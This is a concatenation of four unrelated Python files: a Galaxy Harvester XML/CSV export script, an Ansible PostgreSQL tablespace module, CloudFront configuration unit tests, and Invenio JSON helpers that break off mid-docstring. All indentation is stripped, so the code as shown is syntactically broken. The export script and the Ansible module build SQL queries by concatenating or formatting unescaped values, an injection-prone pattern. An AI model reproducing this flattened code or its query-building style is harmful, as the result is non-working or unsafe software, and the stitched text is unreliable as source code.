Galaxy Harvester is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Galaxy Harvester is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with Galaxy Harvester. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import pymysql
from datetime import date, datetime
import time
from time import localtime, strptime, strftime
import dbInfo
def ghConn():
conn = pymysql.connect(host = dbInfo.DB_HOST,
db = dbInfo.DB_NAME,
user = dbInfo.DB_USER,
passwd = dbInfo.DB_PASS)
return conn
def n2z(inVal):
if (inVal == '' or inVal == None or inVal == 'undefined' or inVal == 'None'):
return '0'
else:
return str(inVal)
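# e.g. n2z(None) -> '0', n2z('') -> '0', n2z(42) -> '42'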
exportType = 'current'
siteDir = 'galaxyharvester.net/'
# check for command line argument to export all
if len(sys.argv) > 1:
exportType = sys.argv[1]
if exportType == 'all':
criteriaStr = '1=1'
orderStr = ' ORDER BY spawnID'
else:
criteriaStr = 'unavailable IS NULL'
orderStr = ' ORDER BY rt1.resourceTypeName'
# Main program
rfc822time = '%a, %d %b %Y %H:%M:%S -0800'
sys.stdout.write(exportType)
conn = ghConn()
galaxyCursor = conn.cursor()
if (galaxyCursor):
galaxySQL = 'SELECT galaxyID, galaxyName, lastExport, galaxyState FROM tGalaxy;'
galaxyCursor.execute(galaxySQL)
galaxyRow = galaxyCursor.fetchone()
while (galaxyRow != None):
if galaxyRow[3] == 1 and (galaxyRow[2] == None or (date(galaxyRow[2].year, galaxyRow[2].month, galaxyRow[2].day) < date.today())):
if exportType == 'all':
exportFile = siteDir + 'exports/all' + str(galaxyRow[0]) + '.xml'
csvFile = siteDir + 'exports/all' + str(galaxyRow[0]) + '.csv'
else:
exportFile = siteDir + 'exports/current' + str(galaxyRow[0]) + '.xml'
csvFile = siteDir + 'exports/current' + str(galaxyRow[0]) + '.csv'
f = open(exportFile, 'w')
fcsv = open(csvFile, 'w')
f.write('<?xml version="1.0" encoding="iso-8859-15"?>\n')
f.write('<resources as_of_date="' + datetime.fromtimestamp(time.time()).strftime(rfc822time) + '">\n')
fcsv.write('"name","galaxy_id","galaxy_name","enter_date","type_id","type_name","group_id","CR","CD","DR","FL","HR","MA","PE","OQ","SR","UT","ER","unavailable_date","planets"\n')
sqlStr1 = 'SELECT spawnID, spawnName, galaxy, entered, enteredBy, tResources.resourceType, rt1.resourceTypeName, rt1.resourceGroup,'
sqlStr1 += ' CR, CD, DR, FL, HR, MA, PE, OQ, SR, UT, ER,'
sqlStr1 += ' rt1.containerType, verified, verifiedBy, unavailable, unavailableBy, rt1.resourceCategory, galaxyName FROM tResources INNER JOIN tResourceType rt1 ON tResources.resourceType = rt1.resourceType INNER JOIN tGalaxy ON tResources.galaxy = tGalaxy.galaxyID WHERE ' + criteriaStr + ' AND galaxy=' + str(galaxyRow[0])
sqlStr1 = sqlStr1 + orderStr + ';'
cursor = conn.cursor()
cursor.execute(sqlStr1)
row = cursor.fetchone()
while (row != None):
if row[22] != None:
unavailStr = row[22].strftime(rfc822time)
else:
unavailStr = ''
resStr = '<resource>'
resStr += '<name>' + row[1] + '</name>'
resStr += '<galaxy id="' + str(row[2]) + '">' + row[25] + '</galaxy>'
resStr += '<enter_date>' + row[3].strftime(rfc822time) + '</enter_date>'
resStr += '<resource_type id="' + row[5] + '">' + row[6] + '</resource_type>'
resStr += '<group_id>' + row[7] + '</group_id>'
resStr += '<stats>'
if row[8] != None and row[8] > 0:
resStr += '<CR>' + str(row[8]) + '</CR>'
if row[9] != None and row[9] > 0:
resStr += '<CD>' + str(row[9]) + '</CD>'
if row[10] != None and row[10] > 0:
resStr += '<DR>' + str(row[10]) + '</DR>'
if row[11] != None and row[11] > 0:
resStr += '<FL>' + str(row[11]) + '</FL>'
if row[12] != None and row[12] > 0:
resStr += '<HR>' + str(row[12]) + '</HR>'
if row[13] != None and row[13] > 0:
resStr += '<MA>' + str(row[13]) + '</MA>'
if row[14] != None and row[14] > 0:
resStr += '<PE>' + str(row[14]) + '</PE>'
if row[15] != None and row[15] > 0:
resStr += '<OQ>' + str(row[15]) + '</OQ>'
if row[16] != None and row[16] > 0:
resStr += '<SR>' + str(row[16]) + '</SR>'
if row[17] != None and row[17] > 0:
resStr += '<UT>' + str(row[17]) + '</UT>'
if row[18] != None and row[18] > 0:
resStr += '<ER>' + str(row[18]) + '</ER>'
resStr += '</stats>'
if row[22] != None:
resStr += '<unavailable_date>' + unavailStr + '</unavailable_date>'
resStr += '<planets>'
planetSQL = 'SELECT planetName FROM tResourcePlanet INNER JOIN tPlanet ON tResourcePlanet.planetID = tPlanet.planetID WHERE spawnID=' + str(row[0]) + ' AND ' + criteriaStr
planetCursor = conn.cursor()
planetCursor.execute(planetSQL)
planetRow = planetCursor.fetchone()
planetStr = ''
while (planetRow != None):
resStr += '<planet>' + planetRow[0] + '</planet>'
if planetStr == '':
planetSeparator = ''
else:
planetSeparator = '|'
planetStr += planetSeparator + planetRow[0]
planetRow = planetCursor.fetchone()
planetCursor.close()
resStr += '</planets>'
resStr += '</resource>\n'
f.write(resStr)
# write csv file line
csvStr = ('"' + row[1] + '",' + str(row[2]) + ',"' + row[25] + '","' + row[3].strftime(rfc822time) + '","' + row[5] + '","' + row[6] + '","' + row[7] + '",' + n2z(row[8]) + ',' + n2z(row[9]) + ',' + n2z(row[10]) + ',' + n2z(row[11]) + ',' + n2z(row[12]) + ',' + n2z(row[13]) + ',' + n2z(row[14]) + ',' + n2z(row[15]) + ',' + n2z(row[16]) + ',' + n2z(row[17]) + ',' + n2z(row[18]) + ',' + unavailStr + ',"' + planetStr + '"\n')
fcsv.write(csvStr)
row = cursor.fetchone()
f.write('</resources>')
f.close()
fcsv.close()
cursor.execute('UPDATE tGalaxy SET lastExport=NOW() WHERE galaxyID=' + str(galaxyRow[0]) + ';')
cursor.close()
galaxyRow = galaxyCursor.fetchone()
galaxyCursor.close()
conn.close()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Flavien Chantelot (@Dorn-)
# Copyright: (c) 2018, Antoine Levy-Lambert (@antoinell)
# Copyright: (c) 2019, Andrew Klychkov (@Andersson007) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'supported_by': 'community',
'status': ['preview']
}
DOCUMENTATION = r'''
---
module: postgresql_tablespace
short_description: Add or remove PostgreSQL tablespaces from remote hosts
description:
- Adds or removes PostgreSQL tablespaces from remote hosts
U(https://www.postgresql.org/docs/current/sql-createtablespace.html),
U(https://www.postgresql.org/docs/current/manage-ag-tablespaces.html).
version_added: '2.8'
options:
tablespace:
description:
- Name of the tablespace to add or remove.
required: true
type: str
aliases:
- name
location:
description:
- Path to the tablespace directory in the file system.
- Ensure that the location exists and has right privileges.
type: path
aliases:
- path
state:
description:
- Tablespace state.
- I(state=present) implies the tablespace must be created if it doesn't exist.
- I(state=absent) implies the tablespace must be removed if present.
I(state=absent) is mutually exclusive with I(location), I(owner), I(rename_to), and I(set).
- See the Notes section for information about check mode restrictions.
type: str
default: present
choices: [ absent, present ]
owner:
description:
- Name of the role to set as an owner of the tablespace.
- If this option is not specified, the tablespace owner is a role that creates the tablespace.
type: str
set:
description:
- Dict of tablespace options to set. Supported from PostgreSQL 9.0.
- For more information see U(https://www.postgresql.org/docs/current/sql-createtablespace.html).
- When reset is passed as an option's value, if the option was set previously, it will be removed
U(https://www.postgresql.org/docs/current/sql-altertablespace.html).
type: dict
rename_to:
description:
- New name of the tablespace.
- The new name cannot begin with pg_, as such names are reserved for system tablespaces.
session_role:
description:
- Switch to session_role after connecting. The specified session_role must
be a role that the current login_user is a member of.
- Permissions checking for SQL commands is carried out as though
the session_role were the one that had logged in originally.
type: str
db:
description:
- Name of database to connect to and run queries against.
type: str
aliases:
- login_db
notes:
- I(state=absent) and I(state=present) (the second one if the tablespace doesn't exist) do not
support check mode because the corresponding PostgreSQL DROP and CREATE TABLESPACE commands
can not be run inside the transaction block.
- The default authentication assumes that you are either logging in as or
sudo'ing to the postgres account on the host.
- To avoid "Peer authentication failed for user postgres" error,
use postgres user as a I(become_user).
- This module uses psycopg2, a Python PostgreSQL database adapter. You must
ensure that psycopg2 is installed on the host before using this module.
- If the remote host is the PostgreSQL server (which is the default case), then
PostgreSQL must also be installed on the remote host.
- For Ubuntu-based systems, install the postgresql, libpq-dev, and python-psycopg2 packages
on the remote host before using this module.
requirements: [ psycopg2 ]
author:
- Flavien Chantelot (@Dorn-)
- Antoine Levy-Lambert (@antoinell)
- Andrew Klychkov (@Andersson007)
extends_documentation_fragment: postgres
'''
EXAMPLES = r'''
- name: Create a new tablespace called acme and set bob as its owner
postgresql_tablespace:
name: acme
owner: bob
location: /data/foo
- name: Create a new tablespace called bar with tablespace options
postgresql_tablespace:
name: bar
set:
random_page_cost: 1
seq_page_cost: 1
- name: Reset random_page_cost option
postgresql_tablespace:
name: bar
set:
random_page_cost: reset
- name: Rename the tablespace from bar to pcie_ssd
postgresql_tablespace:
name: bar
rename_to: pcie_ssd
- name: Drop tablespace called bloat
postgresql_tablespace:
name: bloat
state: absent
'''
RETURN = r'''
queries:
description: List of queries that this module tried to execute.
returned: always
type: str
sample: [ "CREATE TABLESPACE bar LOCATION '/incredible/ssd'" ]
tablespace:
description: Tablespace name.
returned: always
type: str
sample: 'ssd'
owner:
description: Tablespace owner.
returned: always
type: str
sample: 'Bob'
options:
description: Tablespace options.
returned: always
type: dict
sample: { 'random_page_cost': 1, 'seq_page_cost': 1 }
location:
description: Path to the tablespace in the file system.
returned: always
type: str
sample: '/incredible/fast/ssd'
newname:
description: New tablespace name
returned: if existent
type: str
sample: new_ssd
state:
description: Tablespace state at the end of execution.
returned: always
type: str
sample: 'present'
'''
try:
from psycopg2 import __version__ as PSYCOPG2_VERSION
from psycopg2.extras import DictCursor
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT as AUTOCOMMIT
from psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED as READ_COMMITTED
except ImportError:
# psycopg2 is checked by connect_to_db()
# from ansible.module_utils.postgres
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import SQLParseError, pg_quote_identifier
from ansible.module_utils.postgres import connect_to_db, postgres_common_argument_spec
from ansible.module_utils._text import to_native
class PgTablespace(object):
def __init__(self, module, cursor, name):
self.module = module
self.cursor = cursor
self.name = name
self.exists = False
self.owner = ''
self.settings = {}
self.location = ''
self.executed_queries = []
self.new_name = ''
self.opt_not_supported = False
# Collect info:
self.get_info()
def get_info(self):
# Check that spcoptions exists:
opt = self.__exec_sql("SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spcoptions'", add_to_executed=False)
# For version 9.1 and earlier:
location = self.__exec_sql("SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spclocation'", add_to_executed=False)
if location:
location = 'spclocation'
else:
location = 'pg_tablespace_location(t.oid)'
if not opt:
self.opt_not_supported = True
query = ("SELECT r.rolname, (SELECT Null), %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
else:
query = ("SELECT r.rolname, t.spcoptions, %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
res = self.__exec_sql(query, add_to_executed=False)
if not res:
self.exists = False
return False
if res[0][0]:
self.exists = True
self.owner = res[0][0]
if res[0][1]:
# Options exist:
for i in res[0][1]:
i = i.split('=')
self.settings[i[0]] = i[1]
if res[0][2]:
# Location exists:
self.location = res[0][2]
def create(self, location):
query = ("CREATE TABLESPACE %s LOCATION '%s'" % (pg_quote_identifier(self.name, 'database'), location))
return self.__exec_sql(query, ddl=True)
def drop(self):
return self.__exec_sql("DROP TABLESPACE %s" % pg_quote_identifier(self.name, 'database'), ddl=True)
def set_owner(self, new_owner):
if new_owner == self.owner:
return False
query = "ALTER TABLESPACE %s OWNER TO %s" % (pg_quote_identifier(self.name, 'database'), new_owner)
return self.__exec_sql(query, ddl=True)
def rename(self, newname):
query = "ALTER TABLESPACE %s RENAME TO %s" % (pg_quote_identifier(self.name, 'database'), newname)
self.new_name = newname
return self.__exec_sql(query, ddl=True)
def set_settings(self, new_settings):
# settings must be a dict {'key': 'value'}
if self.opt_not_supported:
return False
changed = False
# Apply new settings:
for i in new_settings:
if new_settings[i] == 'reset':
if i in self.settings:
changed = self.__reset_setting(i)
self.settings[i] = None
elif (i not in self.settings) or (str(new_settings[i]) != self.settings[i]):
changed = self.__set_setting("%s = '%s'" % (i, new_settings[i]))
return changed
def __reset_setting(self, setting):
query = "ALTER TABLESPACE %s RESET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return self.__exec_sql(query, ddl=True)
def __set_setting(self, setting):
query = "ALTER TABLESPACE %s SET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return self.__exec_sql(query, ddl=True)
def __exec_sql(self, query, ddl=False, add_to_executed=True):
try:
self.cursor.execute(query)
if add_to_executed:
self.executed_queries.append(query)
if not ddl:
res = self.cursor.fetchall()
return res
return True
except Exception as e:
self.module.fail_json(msg="Cannot execute SQL '%s': %s" % (query, to_native(e)))
return False
# ===========================================
# Module execution.
#
def main():
argument_spec = postgres_common_argument_spec()
argument_spec.update(
tablespace=dict(type='str', aliases=['name']),
state=dict(type='str', default="present", choices=["absent", "present"]),
location=dict(type='path', aliases=['path']),
owner=dict(type='str'),
set=dict(type='dict'),
rename_to=dict(type='str'),
db=dict(type='str', aliases=['login_db']),
session_role=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=(('positional_args', 'named_args'),),
supports_check_mode=True,
)
tablespace = module.params["tablespace"]
state = module.params["state"]
location = module.params["location"]
owner = module.params["owner"]
rename_to = module.params["rename_to"]
settings = module.params["set"]
if state == 'absent' and (location or owner or rename_to or settings):
module.fail_json(msg="state=absent is mutually exclusive location, "
"owner, rename_to, and set")
db_connection = connect_to_db(module, autocommit=True)
cursor = db_connection.cursor(cursor_factory=DictCursor)
# Change autocommit to False if check_mode:
if module.check_mode:
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=False)
else:
db_connection.set_isolation_level(READ_COMMITTED)
# Set defaults:
autocommit = False
changed = False
##############
# Create PgTablespace object and do main job:
tblspace = PgTablespace(module, cursor, tablespace)
# If tablespace exists with different location, exit:
if tblspace.exists and location and location != tblspace.location:
module.fail_json(msg="Tablespace '%s' exists with different location '%s'" % (tblspace.name, tblspace.location))
# Create new tablespace:
if not tblspace.exists and state == 'present':
if rename_to:
module.fail_json(msg="Tablespace %s does not exist, nothing to rename" % tablespace)
if not location:
module.fail_json(msg="'location' parameter must be passed with "
"state=present if the tablespace doesn't exist")
# Because CREATE TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.create(location)
# Drop non-existing tablespace:
elif not tblspace.exists and state == 'absent':
# Nothing to do:
module.fail_json(msg="Tries to drop nonexistent tablespace '%s'" % tblspace.name)
# Drop existing tablespace:
elif tblspace.exists and state == 'absent':
# Because DROP TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.drop()
# Rename tablespace:
elif tblspace.exists and rename_to:
if tblspace.name != rename_to:
changed = tblspace.rename(rename_to)
if state == 'present':
# Refresh information:
tblspace.get_info()
# Change owner and settings:
if state == 'present' and tblspace.exists:
if owner:
changed = tblspace.set_owner(owner)
if settings:
changed = tblspace.set_settings(settings)
tblspace.get_info()
# Rollback if it's possible and check_mode:
if not autocommit:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
cursor.close()
db_connection.close()
# Make return values:
kw = dict(
changed=changed,
state='present',
tablespace=tblspace.name,
owner=tblspace.owner,
queries=tblspace.executed_queries,
options=tblspace.settings,
location=tblspace.location,
)
if state == 'present':
kw['state'] = 'present'
if tblspace.new_name:
kw['newname'] = tblspace.new_name
elif state == 'absent':
kw['state'] = 'absent'
module.exit_json(**kw)
if __name__ == '__main__':
main()
|
#!/usr/bin/python3
from amazonia.classes.cf_distribution_config import CFDistributionConfig, CFCacheBehaviorConfig, CFOriginsConfig
from amazonia.classes.amz_cf_distribution import CFDistributionLeaf, CFDistributionUnit
from network_setup import get_network_config
from nose.tools import *
def create_cf_distribution_config(aliases=['wwwelb.ap-southeast-2.elb.amazonaws.com'],
comment='UnitTestCFDistConfig',
default_root_object='index.html',
enabled=True, price_class='PriceClass_All',
error_page_path='index.html',
acm_cert_arn='arn.acm.certificate',
minimum_protocol_version='TLSv1',
ssl_support_method='sni-only'):
"""
Create a CFDistributionConfig object
:param aliases: A list of DNS CNAME aliases
:param comment: A description for the distribution
:param default_root_object: The object (e.g. index.html) that should be provided when the root URL is requested
    :param enabled: Controls whether the distribution is enabled to accept user requests
:param price_class: The price class that corresponds with the maximum price to be paid for the service
:param error_page_path: The error page that should be served when an HTTP error code is returned
:param acm_cert_arn: ARN of the ACM certificate
:param minimum_protocol_version: The minimum version of the SSL protocol that should be used for HTTPS
:param ssl_support_method: Specifies how Cloudfront serves HTTPS requests
:return: Instance of CFDistributionConfig
"""
cf_distribution_config = CFDistributionConfig(
aliases=aliases,
comment=comment,
default_root_object=default_root_object,
enabled=enabled,
price_class=price_class,
error_page_path=error_page_path,
acm_cert_arn=acm_cert_arn,
minimum_protocol_version=minimum_protocol_version,
ssl_support_method=ssl_support_method
)
return cf_distribution_config
def create_s3_origin(domain_name='amazonia-elb-bucket.s3.amazonaws.com', origin_id='S3-bucket-id',
is_s3=True, origin_access_identity='originaccessid1'):
"""
Create an S3Origin object
:param domain_name: The DNS name of the S3 bucket or HTTP server which this distribution will point to
:param origin_id: An identifier for this origin (must be unique within this distribution)
:param is_s3: Boolean value indicating whether the object is an S3Origin or a CustomOrigin
:param origin_access_identity: The Cloudfront origin access identity to associate with the origin
:return: Instance of S3Origin object
"""
origin = CFOriginsConfig(
domain_name=domain_name,
origin_id=origin_id,
origin_path='',
custom_headers={
'Origin': 'http://www.domain.com',
'Accept': 'True'
},
origin_policy={
'is_s3': is_s3,
'origin_access_identity': origin_access_identity
}
)
return origin
def create_custom_origin(domain_name='amazonia-elb-bucket.s3.amazonaws.com',
origin_id='S3-bucket-id',
is_s3=False,
origin_protocol_policy='https-only',
http_port='80',
https_port='443',
origin_ssl_protocols=['TLSv1', 'TLSv1.1', 'TLSv1.2']):
"""
Create a CustomOrigin object
:param domain_name: The DNS name of the S3 bucket or HTTP server which this distribution will point to
:param origin_id: An identifier for this origin (must be unique within this distribution)
:param is_s3: Boolean value indicating whether the object is an S3Origin or a CustomOrigin
:param origin_protocol_policy: Which protocols the origin listens on (http, https, both)
:param http_port: The HTTP port the origin listens on
:param https_port: The HTTPS port the origin listens on
:param origin_ssl_protocols: The SSL protocols to be used when establishing an HTTPS connection with the origin
:return: Instance of CustomOrigin object
"""
origin = CFOriginsConfig(
domain_name=domain_name,
origin_id=origin_id,
origin_path='/path',
custom_headers={},
origin_policy={
'is_s3': is_s3,
'origin_protocol_policy': origin_protocol_policy,
'http_port': http_port,
'https_port': https_port,
'origin_ssl_protocols': origin_ssl_protocols,
}
)
return origin
def create_cache_behavior(is_default=False,
path_pattern='/index.html',
allowed_methods=['GET', 'POST'],
cached_methods=['GET', 'POST'],
target_origin_id='S3-bucket-id',
forward_cookies='all',
forwarded_headers=['Accept', 'Set-Cookie'],
viewer_protocol_policy='allow-all',
min_ttl=0,
default_ttl=0,
max_ttl=0,
trusted_signers=['self'],
query_string=True):
"""
    :param is_default: Whether this is the default cache behavior for the distribution
    :param path_pattern: The pattern to which this cache behavior applies
:param allowed_methods: List of HTTP methods that can be passed to the origin
:param cached_methods: List of HTTP methods for which Cloudfront caches responses
:param target_origin_id: Value of the unique ID for the default cache behavior of this distribution
:param viewer_protocol_policy: The protocol that users can use to access origin files
:param min_ttl: The minimum amount of time objects should stay in the cache
:param default_ttl: The default amount of time objects stay in the cache
:param max_ttl: The maximum amount of time objects should stay in the cache
    :param forward_cookies: Which cookies to forward to the origin (e.g. 'all')
:param forwarded_headers: list of headers to forward to origin
    :param trusted_signers: list of identities that are trusted to sign cookies on behalf of this behavior
:param query_string: indicates whether to forward query strings to the origin
:return: Instance of CacheBehavior object
"""
cache_behavior = CFCacheBehaviorConfig(
is_default=is_default,
path_pattern=path_pattern,
allowed_methods=allowed_methods,
cached_methods=cached_methods,
target_origin_id=target_origin_id,
forward_cookies=forward_cookies,
forwarded_headers=forwarded_headers,
viewer_protocol_policy=viewer_protocol_policy,
min_ttl=min_ttl,
default_ttl=default_ttl,
max_ttl=max_ttl,
trusted_signers=trusted_signers,
query_string=query_string
)
return cache_behavior
def test_s3_origin():
"""
Test to check S3Origin object inputs match the created outputs
"""
domain_name = 'www.domain.com'
is_s3 = True
origin_access_identity = 'origin-access-identity/cloudfront/TestOAI'
helper_cf_origin = create_s3_origin(domain_name=domain_name,
is_s3=is_s3,
origin_access_identity=origin_access_identity
)
assert_equal(domain_name, helper_cf_origin.domain_name)
assert_equal(is_s3, helper_cf_origin.origin_policy['is_s3'])
assert_equal(origin_access_identity, helper_cf_origin.origin_access_identity)
def test_s3_origin_oai():
"""
Test to check S3Origin object inputs match the created outputs
"""
domain_name = 'www.domain.com'
is_s3 = True
origin_access_identity = 'TestOAI'
helper_cf_origin = create_s3_origin(domain_name=domain_name,
is_s3=is_s3,
origin_access_identity=origin_access_identity
)
assert_equal(domain_name, helper_cf_origin.domain_name)
assert_equal(is_s3, helper_cf_origin.origin_policy['is_s3'])
assert_equal(origin_access_identity, helper_cf_origin.origin_access_identity)
def test_custom_origin():
"""
Test to check CustomOrigin object inputs match the created outputs
"""
domain_name = 'www.domain.com'
is_s3 = False
origin_protocol_policy = 'https-only'
http_port = '80'
https_port = '443'
origin_ssl_protocols = ['TLSv1', 'TLSv1.1', 'TLSv1.2']
helper_cf_origin = create_custom_origin(domain_name=domain_name,
is_s3=is_s3,
origin_protocol_policy=origin_protocol_policy,
http_port=http_port,
https_port=https_port,
origin_ssl_protocols=origin_ssl_protocols
)
assert_equal(domain_name, helper_cf_origin.domain_name)
assert_equal(is_s3, helper_cf_origin.origin_policy['is_s3'])
assert_equal(origin_protocol_policy, helper_cf_origin.origin_protocol_policy)
assert_equal(http_port, helper_cf_origin.http_port)
assert_equal(https_port, helper_cf_origin.https_port)
assert_equal(origin_ssl_protocols, helper_cf_origin.origin_ssl_protocols)
def test_cf_cache_behavior():
"""
Test to check CacheBehavior object inputs match the created outputs
"""
is_default = False
path_pattern = '/index.html'
allowed_methods = ['GET', 'POST']
    cached_methods = ['GET', 'POST']
target_origin_id = 'S3-bucket-id'
forward_cookies = 'all'
forwarded_headers = ['Accept', 'Set-Cookie']
viewer_protocol_policy = 'allow-all'
min_ttl = 0
default_ttl = 0
max_ttl = 0
trusted_signers = ['self']
query_string = True
helper_cf_cache_behavior = create_cache_behavior(is_default=is_default,
path_pattern=path_pattern,
allowed_methods=allowed_methods,
cached_methods=cached_methods,
target_origin_id=target_origin_id,
forward_cookies=forward_cookies,
forwarded_headers=forwarded_headers,
viewer_protocol_policy=viewer_protocol_policy,
min_ttl=min_ttl,
default_ttl=default_ttl,
max_ttl=max_ttl,
trusted_signers=trusted_signers,
query_string=query_string)
assert_equal(is_default, helper_cf_cache_behavior.is_default)
assert_equal(path_pattern, helper_cf_cache_behavior.path_pattern)
assert_equal(allowed_methods, helper_cf_cache_behavior.allowed_methods)
assert_equal(cached_methods, helper_cf_cache_behavior.cached_methods)
assert_equal(target_origin_id, helper_cf_cache_behavior.target_origin_id)
assert_equal(forward_cookies, helper_cf_cache_behavior.forward_cookies)
assert_equal(forwarded_headers, helper_cf_cache_behavior.forwarded_headers)
assert_equal(min_ttl, helper_cf_cache_behavior.min_ttl)
assert_equal(default_ttl, helper_cf_cache_behavior.default_ttl)
assert_equal(max_ttl, helper_cf_cache_behavior.max_ttl)
assert_equal(trusted_signers, helper_cf_cache_behavior.trusted_signers)
assert_equal(query_string, helper_cf_cache_behavior.query_string)
def test_cf_distribution_config():
"""
Test to check DistributionConfig object inputs match the created outputs
"""
aliases = ['wwwelb.ap-southeast-2.elb.amazonaws.com']
comment = 'UnitTestCFDistConfig'
default_root_object = 'index.html'
enabled = True
price_class = 'PriceClass_All'
error_page_path = 'index.html'
acm_cert_arn = 'arn:aws:acm:us-east-1:123456789012:certificate/12345678-abcd-efgh-1234-abcd12345678'
minimum_protocol_version = 'TLSv1'
ssl_support_method = 'sni-only'
cf_dist_config = create_cf_distribution_config(aliases=aliases,
comment=comment,
default_root_object=default_root_object,
enabled=enabled,
price_class=price_class,
error_page_path=error_page_path,
acm_cert_arn=acm_cert_arn,
minimum_protocol_version=minimum_protocol_version,
ssl_support_method=ssl_support_method)
assert_equal(aliases, cf_dist_config.aliases)
assert_equal(comment, cf_dist_config.comment)
assert_equal(default_root_object, cf_dist_config.default_root_object)
assert_equal(enabled, cf_dist_config.enabled)
assert_equal(price_class, cf_dist_config.price_class)
assert_equal(acm_cert_arn, cf_dist_config.acm_cert_arn)
assert_equal(error_page_path, cf_dist_config.error_page_path)
def test_cf_distribution_unit():
"""
Test CF distribution unit structure
"""
network_config, template = get_network_config()
cf_dist_config = create_cf_distribution_config()
origins = [create_s3_origin(), create_s3_origin()]
default_behaviour = create_cache_behavior()
default_behaviour.is_default = True
cache_behaviors = [default_behaviour, create_cache_behavior()]
unit_title = 'testcf'
cf_dist_unit = CFDistributionUnit(unit_title=unit_title,
cf_distribution_config=cf_dist_config,
stack_config=network_config,
cf_origins_config=origins,
cf_cache_behavior_config=cache_behaviors,
template=template)
assert_equals(cf_dist_unit.title, unit_title)
def test_cf_distribution_tree():
"""
Test CF distribution leaf structure
"""
network_config, template = get_network_config()
cf_dist_config = create_cf_distribution_config()
origins = [create_s3_origin(), create_s3_origin()]
default_behaviour = create_cache_behavior()
default_behaviour.is_default = True
cache_behaviors = [default_behaviour, create_cache_behavior()]
leaf_title = 'testcf'
tree_name = 'testtree'
cf_dist_unit = CFDistributionLeaf(leaf_title=leaf_title,
cf_distribution_config=cf_dist_config,
tree_name=tree_name,
cf_origins_config=origins,
cf_cache_behavior_config=cache_behaviors,
template=template)
assert_equals(cf_dist_unit.title, leaf_title)
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2011, 2012 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""JSON utilities."""
from __future__ import absolute_import
import json
CFG_JSON_AVAILABLE = True
import re
import six
def json_unicode_to_utf8(data):
"""Change all strings in a JSON structure to UTF-8."""
if type(data) == unicode:
return data.encode('utf-8')
elif type(data) == dict:
newdict = {}
for key in data:
newdict[json_unicode_to_utf8(key)] = json_unicode_to_utf8(data[key])
return newdict
elif type(data) == list:
return [json_unicode_to_utf8(elem) for elem in data]
else:
return data
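# Illustrative sketch (not part of the original module): on Python 2 this
# walks a decoded JSON structure and re-encodes every unicode string,
# including dictionary keys, as a UTF-8 byte string.
#
#   decoded = json.loads(u'{"stra\u00dfe": ["caf\u00e9", 1]}')
#   encoded = json_unicode_to_utf8(decoded)
#   # encoded == {'stra\xc3\x9fe': ['caf\xc3\xa9', 1]}   (str keys/values, no unicode)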
def json_decode_file(filename):
"""
Parses a textfile using json to build a python object representation
"""
seq = open(filename).read()
## The JSON standard has no comments syntax. We have to remove them
## before feeding python's JSON parser
seq = json_remove_comments(seq)
## Parse all the unicode stuff to utf-8
return json_unicode_to_utf8(json.loads(seq))
def json_remove_comments(text):
""" Removes C style comments from the given string. Will keep newline
characters intact. This way parsing errors from json will point to the
right line.
This is primarily used to make comments in JSON files possible.
    The JSON standard has no comment syntax, but we want to use
    JSON for our profiles and configuration files. The comments need to be
    removed first, before the text can be fed to the JSON parser of Python.
@param text: JSON string that should be cleaned
@type text: string
@return: Cleaned JSON
@rtype: string
"""
def replacer(match):
s = match.group(0)
if s.startswith('/'):
return ""
else:
return s
pattern = re.compile(
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE
)
return re.sub(pattern, replacer, text)
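# Illustrative sketch (not part of the original module): comments are
# stripped while string literals that merely contain "//" survive, so the
# cleaned text can be handed straight to json.loads().
#
#   raw = '{"url": "http://example.org", // trailing comment\n "debug": true /* note */}'
#   json.loads(json_remove_comments(raw))
#   # -> {u'url': u'http://example.org', u'debug': True}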
def wash_for_js(text):
"""
DEPRECATED: use htmlutils.escape_javascript_string() instead,
